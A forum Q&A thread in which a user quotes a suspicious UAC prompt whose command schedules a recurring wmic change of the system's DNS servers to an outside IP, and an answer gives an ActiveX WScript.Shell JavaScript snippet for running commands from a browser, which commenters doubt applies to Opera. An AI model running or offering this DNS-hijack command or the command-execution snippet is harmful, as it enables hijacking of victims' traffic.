How a browser manages to execute a command in cmd?

Question

Some time ago while visiting some web site in Opera 12.12 following Windows 7 UAC prompt appeared on screen:

C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")

Obviously, I declined it.

The method by which phishers attempted to get my data is pretty clear, but how they did manage to execute the command from browser?

score 2 · Accepted Answer · answered Sep 20 '14 at 10:19

2

Phishers may use Javascript like this:

var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);

It works only if you turn off the security features in your browser which will need to use ActiveX.

answered Sep 20 '14 at 10:19

Leo Chapiro

15,459
5
42
45

2

Oops... Never knew that Opera is able to work with ActiveX. Thought that it works in IE only. – Paul Sep 21 '14 at 06:26
What? ActiveX in Opera? As I understand [this Opera help page](http://help.opera.com/Windows/12.10/en/activex.html), this isn't the case. – nixda Sep 24 '14 at 21:23

How a browser manages to execute a command in cmd?

1 Answers1